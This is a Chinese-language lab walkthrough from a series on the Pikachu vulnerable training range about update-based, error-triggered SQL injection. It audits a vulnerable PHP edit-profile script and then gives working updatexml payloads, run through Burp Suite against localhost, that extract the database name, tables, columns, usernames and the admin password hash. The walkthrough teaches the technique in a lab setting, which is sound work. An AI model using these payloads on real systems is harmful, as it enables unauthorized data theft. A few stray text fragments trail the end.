目录
一、SQL注入
二、update注入
三、报错型注入
四、源码分析
1、代码审计
2、渗透思路
五、渗透实战
1、渗透准备
2、获取数据库名database
3、获取表名table
4、获取列名column
5、获取字段
本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对update注入关卡源码的代码审计找到SQL注入安全风险的真实原因,讲解update注入的原理并进行渗透实践,本文为SQL注入05-2之update注入关卡的渗透部分。
一、SQL注入
SQL 注入是指攻击者会在应用程序的输入字段中插入恶意的 SQL 代码,从而改变原有的 SQL 查询逻辑。通过这种方式,他们能够非法获取、修改或删除数据库中的数据,甚至可能夺取数据库的管理权限。SQL注入攻击的常见场景如下所示,今天我们这篇文章讲的就是第三部分更新注入。
- 登录表单:在网站的登录页面,用户通常要输入用户名和密码以完成身份验证。若后端代码在处理用户输入时,未对输入内容开展严格的验证工作,而是直接将其拼接到 SQL 查询语句里,那么攻击者就有机会精心构造特殊的输入内容。通过这种方式,他们能够巧妙地绕过正常的登录验证机制,进而非法获取系统的访问权限。
- 搜索功能:当网站具备搜索功能时,用户输入的搜索关键词会被应用于数据库查询操作。一旦对这些输入关键词的处理不足,比如没有进行严格的验证和过滤,攻击者就可以借助输入特制的关键词,实施 SQL 注入攻击。通过这种攻击手段,他们能够非法获取数据库中的敏感信息,如用户的个人隐私、商业机密等。
- 数据插入(insert注入)与更新(update注入):在涉及数据插入(例如用户注册新账户)以及数据更新(例如用户修改个人信息)的操作过程中,若系统没有对用户输入的数据进行有效的过滤和严格的验证,攻击者就能够构造恶意的输入内容。这些恶意输入可以对 SQL 语句进行篡改,从而实现修改数据库中数据,非法获取数据库中的敏感信息等目的。
二、update注入
Update 注入是 SQL 注入的一种类型,攻击者针对 SQL 语句中的Update 操作,利用应用程序在处理用户输入时的SQL注入安全风险,构造恶意输入并将其插入到Update 语句里,从而改变原本的更新逻辑,实现非法的数据修改、获取数据库敏感信息,甚至执行系统命令等目的。
三、报错型注入
报错型注入属于 SQL 注入的一种类型,攻击者借助构造特殊的 SQL 语句,让数据库在执行时出现错误,再从错误信息中提取出敏感数据。由于数据库的错误信息常常会包含一些关键的数据,像数据库名、表名、列名以及数据内容等,攻击者就可以利用这些信息来获取数据库的详细情况。
报错型注入是利用数据库函数故意触发错误信息来获取数据的攻击技术,以下是常见的数据库关键报错函数。
| 函数 | 最大回显长度 | MySQL版本支持 | 特殊要求 |
|---|---|---|---|
updatexml | 32字节 | 5.1.5+ | 需要XPath错误触发 |
extractvalue | 32字节 | 5.1.5+ | 需要XPath错误触发 |
floor | 无限制 | 5.0+ | 需要GROUP BY |
exp | 无限制 | 5.5.5+ | 数值溢出触发 |
四、源码分析
1、代码审计
打开pikachu靶场的SQL注入-报错型关卡对应的源码sqli_edit.php,具体如下所示。
很明显SQL语句没有对POST方法传入的多个参数进行过滤,存在SQL注入风险,详细注释后的代码如下所示。
<?php
// 调用 connect 函数建立与数据库的连接,并将连接对象赋值给变量 $link
$link = connect();// 调用 check_sqli_session 函数检查用户是否已经登录
// 如果用户未登录,会执行以下操作
if (!check_sqli_session($link)) {// 弹出提示框,提示用户登录后才能进入会员中心echo "<script>alert('登录后才能进入会员中心哦')</script>";// 将用户重定向到登录页面header("location:sqli_login.php");
}// 初始化用于存储 HTML 内容的变量,用于后续显示错误信息
$html1 = '';// 检查是否通过 POST 方法提交了表单
if (isset($_POST['submit'])) {// 检查提交的表单中 sex、phonenum、add 和 email 字段是否不为空if ($_POST['sex'] != null && $_POST['phonenum'] != null && $_POST['add'] != null && $_POST['email'] != null) {// 注释掉的代码,原本的意图是对 POST 数据进行转义处理,防止 SQL 注入// $getdata = escape($link, $_POST);// 未对 POST 数据进行转义处理,直接将其赋值给 $getdata 变量$getdata = $_POST;// 构造一个 SQL 更新语句,根据当前登录用户的用户名更新 member 表中的用户信息$query = "update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['sqli']['username']}'";// 调用 execute 函数执行构造好的 SQL 更新语句$result = execute($link, $query);// 检查执行更新操作后受影响的行数是否为 1 或者 0// 受影响行数为 1 表示更新成功,为 0 表示没有需要更新的数据if (mysqli_affected_rows($link) == 1 || mysqli_affected_rows($link) == 0) {// 如果更新操作成功或没有需要更新的数据,将用户重定向到会员中心页面header("location:sqli_mem.php");} else {// 如果更新操作失败,将错误提示信息添加到 $html1 变量中$html1 .= '修改失败,请重试';}}
}
?>这段 PHP 代码实现了会员中心用户信息修改的功能,同时进行了登录验证。具体步骤如下所示。
- 建立与数据库的连接。
- 检查用户是否已经登录,如果未登录,弹出提示框并将用户重定向到登录页面。
- 若用户已登录,当用户通过 POST 方法提交表单时,检查
sex、phonenum、add和email字段是否为空。 - 若字段不为空,构造 SQL 更新语句,根据当前登录用户的用户名更新
member表中的用户信息。 - 根据更新操作的结果,将用户重定向到会员中心页面或显示错误提示信息。
然而此代码存在SQL注入安全风险,主要原因是对用户输入的数据未进行任何转义或验证处理。代码中原本注释掉了转义函数调用 $getdata = escape($link, $_POST);,而直接使用 $getdata = $_POST; 将用户输入的数据拼接到 SQL 更新语句中。攻击者可以利用SQL注入安全风险,通过构造特殊的输入内容来改变 SQL 语句的逻辑,从而实现恶意操作。
2、渗透思路
基于代码审计,我们知道SQL居于中传入的参数中sex, phonenum, email, address均为注入点。
update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['sqli']['username']}'构造闭合语句:liujiannan01' and updatexml(0, concat(0x7e,database()),1) or ' 如下所示。
五、渗透实战
1、渗透准备
打开靶场SQL注入第五关insert/update型注入,打开后是登录页面,如下所示。
http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_login.php
输入用户名lucy和密码123456登录,如下所示进入到个人信息的界面。
http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_mem.php
点击“修改个人信息”进入到修改页面,如下所示。
http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_edit.php
此时进入到lucy的个人信息修改页面,可以修改的参数包括需要填写的性别、邮寄、邮箱和住址信息,这与代码审计的分析一致,完整URL地址如下所示。
http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_edit.phpbp开启抓包在注册信息中填写内容,将内容修改为1,2,3,4,如下所示。
burpsuite抓包,找到这个修改报文,具体信息如下所示,POST方法传参包sex, phonenum, email, address,这与源码分析一致,由于使用POST方法传参,故而我们使用bp进行渗透。
2、获取数据库名database
mooyuan1' and updatexml(0, concat(0x7e,database()),1) or '再次点击修改,在性别的输入框内输入mooyuan1' and updatexml(0, concat(0x7e,database()),1) or '后点击提交,如下所示。
此时页面提示报错信息,爆出数据库的名称为“pikachu”,具体如下所示。
此时burpsuite抓包如下所示,将报文发送到repeater,后续通过修改POST内容进行注入。
3、获取表名table
对pikchu数据库中表名进行爆破,注入命令如下所示。
sex=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')),0) or '&phonenum=2&add=3&email=4&submit=submit渗透后获取到数据库pikachu表有4个以上的table表,但是第五个没有展示全,只有一个x字符,其他前四个分别为httpinfo, member,message, users,如下所示。
之所以没有展示全是因为update的报错信息最多展示32个字符,出去第一个字符是报错的波浪线以外,也就是说有效的字符只能显示31个。接下来使用right函数显示从右到左31个字符,具体注入命令如下所示 。
sex=' or updatexml(1, concat(0x7e,right((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),31)),0) or '&phonenum=2&add=3&email=4&submit=submit点击发送后,展示从右开始31个字符,与上一个图片对比可知最后一个table表为xssblind。
4、获取列名column
对pikchu数据库中users表中的列名进行爆破,注入命令如下所示。
sex=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu'
)),0) or '&phonenum=2&add=3&email=4&submit=submit渗透后获取到数据库users表有4个column列,分别为id,username,password,level,如下所示。
5、获取字段
对pikachu数据库中users表的username列进行爆破,命令如下所示。
sex=' or updatexml(1,concat(0x7e,(select group_concat(username) from users)),0) or '&phonenum=2&add=3&email=4&submit=submit渗透后获取到数据库users表的username字段如下所示,渗透成功。
接下来获取admin账户的密码,注入命令如下所示但是没有显示完全,如下所示。
sex=' or updatexml(1,concat(0x7e,(select group_concat(password) from users where username='admin')),0) or '&phonenum=2&add=3&email=4&submit=submit
我们通过substr函数获取admin账户的密码的第32位开始的31个字符串,注入命令如下所示显示了一个字符e,拼接后即可获取到admin的密码,e10adc3949ba59abbe56e057f20f883e,如下所示。
sex=' or updatexml(1,concat(0x7e,substr((select group_concat(concat(password)) from users where username='admin'),32,31)),1) or '&phonenum=2&add=3&email=4&submit=submit
排序)
)
:通过博弈机制,引导生成)
